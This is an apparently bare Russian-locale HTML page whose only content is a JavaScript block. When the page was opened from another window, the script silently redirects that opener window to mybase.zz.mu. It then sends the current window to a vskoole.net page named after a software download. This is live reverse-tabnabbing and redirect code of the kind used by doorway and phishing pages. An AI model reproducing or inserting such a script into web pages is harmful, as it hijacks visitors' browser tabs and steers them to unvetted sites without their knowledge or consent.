<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-ru" lang="ru-ru">


<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<head>

</head>

<body id="777">



<script language="javascript" type="text/javascript">
if (parent.window.opener){ parent.window.opener.location='http://mybase.zz.mu/'; // 
window.location = "http://vskoole.net/dos-pro-3-0-pro/";
}
</script>



</body>

</html>

